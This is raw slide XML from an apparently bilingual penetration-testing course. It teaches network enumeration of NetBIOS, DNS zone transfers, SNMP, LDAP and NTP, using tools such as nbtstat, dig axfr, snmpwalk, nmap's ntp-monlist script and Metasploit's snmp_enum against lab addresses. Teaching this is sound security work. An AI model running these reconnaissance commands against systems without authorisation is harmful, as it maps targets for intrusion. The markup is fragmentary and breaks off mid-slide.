            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>139/138 TCP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>137 UDP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On windows you can test with “nbtstat”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-a for netbios name</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-A for ip</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-c show cache</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Suffix Codes are in netbios and netbios over tcp/ip on wiki</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On windows “net view \\192.168.1.13” will show shares. This will connect with a specific NULL session</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GUIs like “netbios  enumeration” on sourceforge or “superscan”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2850" y="1069200"/>
            <a:ext cx="3942600" cy="3005100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>لب</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891175" y="1069200"/>
            <a:ext cx="3942600" cy="3005100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>کارکرد</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ماشین مجازی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>کالی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ویندوزها (سرور، ۱۰، ۸، …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASPBWA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6"/>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76" name="Google Shape;276;p46"/>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Port 53</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>“DNS Zone transfer” sends DNS info from one server to another server; to have HA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Win: nslookup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>&gt; server ns.server.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>&gt; type=any</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>&gt; ls -d server.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Linux:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ig server.com axfr</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SNMP</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82" name="Google Shape;282;p47"/>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Concept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Port 161 UDP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> string is like password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Versions 1, 2, 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On windows snmputil.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>get</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>getnext</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Walk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SNScan (from McAfee, also checks network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IP Network Browser (Solarwinds)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etaspolit also has SNMP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>search snmp &amp; we will use snmp_enum</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>se auxiliary/scanner/snmp/snmp_enum</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>how options</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>et RHOSTS 192.168.1.13</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>un</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>snmpwalk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-c public demo.snmplabs.com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8"/>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LDAP</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88" name="Google Shape;288;p48"/>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Lightweight Directory Access Protocol (LDAP) is used to interact with and organize databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most of the time windows server is running LDAP alongside Active Directory but can work with Novell eDirectory, OpenLDAP, Open Directory, Oracle iPlanet too. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP 389 is unencrypted and you will be able to see the user / pass if its plain text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Port 636 is encrypted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Jxplorer.org</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To prevent enumeration, you should define correct permissions and security settings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NTP</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294" name="Google Shape;294;p49"/>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UDP 123</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Works like a chain of clocks and gives all machines same time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Time is important for DBs, logs, certs, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Older versions of NTP will provide you the IP of its clients</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tpdc (cli, help, monlist)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tpdate pool.ntp.org</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>map -sU -pU:123 --script=ntp-monlist 192.168.1.13 (check on nmap manual site)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0"/>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SMTP</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00" name="Google Shape;300;p50"/>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Email addresses are everywhere: site, cards</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
